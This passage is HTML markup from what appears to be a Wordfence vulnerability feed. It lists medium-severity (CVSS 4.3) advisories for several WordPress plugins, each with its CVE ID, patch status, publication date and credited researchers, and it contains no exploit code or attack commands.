		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d80ed885-43f8-43a4-bc61-e9ef92e3207e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/448df3b0-32a7-4097-a37d-07e253993496" target="_blank" rel="noopener">LatePoint &lt;= 5.6.3 &#8211; Authenticated (Custom+) Insecure Direct Object Reference to Arbitrary Booking Deletion and Customer/Booking Data Disclosure via Abilities REST API (list-bookings, list-customers, delete-booking)</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13471" target="_blank" rel="noopener noreferrer">							CVE-2026-13471						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/latepoint-2" target="_blank" rel="noopener">Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress</a> <span class="wfvr-software-slug">[latepoint]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26a32c073d7e4edde36367c0e7b51808.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26a32c073d7e4edde36367c0e7b51808"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener">skyv3il</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8d0b3f283d2748d1077325cb2522f7ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d0b3f283d2748d1077325cb2522f7ff"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener">Chirita Catalin-Andrei (CC99IE)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/691c3168925c59eae700032d1721a348.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="691c3168925c59eae700032d1721a348"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener">AmonRa</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd6f772c2edc5370a6f2829036933466.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd6f772c2edc5370a6f2829036933466"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener">MrProperCTF</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/448df3b0-32a7-4097-a37d-07e253993496" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f66d26a-8eb7-4b29-bb7f-afdd762be4b2" target="_blank" rel="noopener">Magazine Blocks &lt;= 1.8.6 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Post Modification / Site-Wide Template Takeover via Builder Templates REST Endpoint</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75017" target="_blank" rel="noopener noreferrer">							CVE-2026-75017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/magazine-blocks" target="_blank" rel="noopener">Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid</a> <span class="wfvr-software-slug">[magazine-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f66d26a-8eb7-4b29-bb7f-afdd762be4b2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70339e26-ff63-488c-9311-b5c221f6a5d9" target="_blank" rel="noopener">MasterStudy LMS &lt;= 3.7.49 &#8211; Authenticated (Instructor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88844" target="_blank" rel="noopener noreferrer">							CVE-2026-88844						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70339e26-ff63-488c-9311-b5c221f6a5d9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5a921c-992f-43d6-9083-9ac75637f66c" target="_blank" rel="noopener">MasterStudy LMS &lt;= 3.7.49 &#8211; Authenticated (Instructor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81340" target="_blank" rel="noopener noreferrer">							CVE-2026-81340						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5a921c-992f-43d6-9083-9ac75637f66c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/624054bd-e4c9-4bff-83a1-abc58687f194" target="_blank" rel="noopener">Meow Gallery &lt;= 5.5.4 &#8211; Authenticated (Author+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92423" target="_blank" rel="noopener noreferrer">							CVE-2026-92423						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meow-gallery" target="_blank" rel="noopener">Meow Gallery</a> <span class="wfvr-software-slug">[meow-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kaan-ozbek-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/58f819303e23c511f57be35a71c19f7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="58f819303e23c511f57be35a71c19f7d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kaan-ozbek-2" target="_blank" rel="noopener">Kaan Özbek</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/624054bd-e4c9-4bff-83a1-abc58687f194" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4a6e380-bec0-455f-8c80-9fd4cf7b7d0a" target="_blank" rel="noopener">MultiVendorX &lt;= 5.0.15 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74926" target="_blank" rel="noopener noreferrer">							CVE-2026-74926						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</a> <span class="wfvr-software-slug">[dc-woocommerce-multi-vendor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4a6e380-bec0-455f-8c80-9fd4cf7b7d0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a74d58c-a416-4cf4-a87e-ba6ca51710a9" target="_blank" rel="noopener">NextGEN Gallery &lt;= 4.4.0 &#8211; Authenticated (Admin+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81654" target="_blank" rel="noopener noreferrer">							CVE-2026-81654						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</a> <span class="wfvr-software-slug">[nextgen-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a74d58c-a416-4cf4-a87e-ba6ca51710a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e2ad0072-8afd-4937-a7f3-2f9354312a66" target="_blank" rel="noopener">NextGEN Gallery &lt;= 4.4.0 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81652" target="_blank" rel="noopener noreferrer">							CVE-2026-81652						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</a> <span class="wfvr-software-slug">[nextgen-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e2ad0072-8afd-4937-a7f3-2f9354312a66" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5227a9b-8bc6-46fc-89b0-a494b572d004" target="_blank" rel="noopener">Nimble Builder &lt;= 3.3.8 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16557" target="_blank" rel="noopener noreferrer">							CVE-2026-16557						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nimble-builder" target="_blank" rel="noopener">Nimble Page Builder</a> <span class="wfvr-software-slug">[nimble-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayush-gangwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1a8f0ec92689cfed49e9d0603226eee4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1a8f0ec92689cfed49e9d0603226eee4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayush-gangwar" target="_blank" rel="noopener">Ayush Gangwar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5227a9b-8bc6-46fc-89b0-a494b572d004" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9278c56-b963-4d9b-ae5a-45dab44c701f" target="_blank" rel="noopener">Partial Shipment for Woocommerce &lt;= 3.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Settings Modification via wxp_order_shipment, wxp_order_item_shipment, and wxp_order_set_shipped AJAX Actions</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9858" target="_blank" rel="noopener noreferrer">							CVE-2026-9858						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-partial-shipment" target="_blank" rel="noopener">Partial Shipment for WooCommerce</a> <span class="wfvr-software-slug">[wc-partial-shipment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhan-luo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f9932c44b54c5b8427aeaa4697fb9106.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f9932c44b54c5b8427aeaa4697fb9106"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhan-luo" target="_blank" rel="noopener">Muhan Luo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9278c56-b963-4d9b-ae5a-45dab44c701f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bbc24f8-ceb7-44c4-8691-7786cbb4f69b" target="_blank" rel="noopener">PDF Builder for WooCommerce. Create invoices,packing slips and more &lt;= 2.0.11 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Invoice Data Disclosure via GetInvoiceDetail AJAX Handler</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11899" target="_blank" rel="noopener noreferrer">							CVE-2026-11899						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-pdf-invoice-builder" target="_blank" rel="noopener">PDF Builder for WooCommerce. Create invoices,packing slips and more</a> <span class="wfvr-software-slug">[woo-pdf-invoice-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3e1f272565d9a00d35ec564d999687a0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3e1f272565d9a00d35ec564d999687a0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaskaranjeet-singh" target="_blank" rel="noopener">Jaskaranjeet Singh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bbc24f8-ceb7-44c4-8691-7786cbb4f69b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74117559-c55a-4b1f-8b39-3a1852463cc0" target="_blank" rel="noopener">Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) &lt;= 9.8.1 &#8211; Missing Authorization to 2FA Bypass</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82519" target="_blank" rel="noopener noreferrer">							CVE-2026-82519						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-ssl" target="_blank" rel="noopener">Really Simple Security – Simple and Performant Security (formerly Really Simple SSL)</a> <span class="wfvr-software-slug">[really-simple-ssl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-holmquist" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dee5a1ba25d9dcc842f7d84932cd40d7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dee5a1ba25d9dcc842f7d84932cd40d7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michael-holmquist" target="_blank" rel="noopener">Michael Holmquist</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74117559-c55a-4b1f-8b39-3a1852463cc0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74f6667f-fa30-454f-a100-cfdb50d47026" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP &lt;= 1.65 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82126" target="_blank" rel="noopener noreferrer">							CVE-2026-82126						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/schema-and-structured-data-for-wp" target="_blank" rel="noopener">Schema &amp; Structured Data for WP &amp; AMP</a> <span class="wfvr-software-slug">[schema-and-structured-data-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shirshak" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/99734a20388f02c119e5f829dc282f10.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99734a20388f02c119e5f829dc282f10"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shirshak" target="_blank" rel="noopener">Shirshak</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
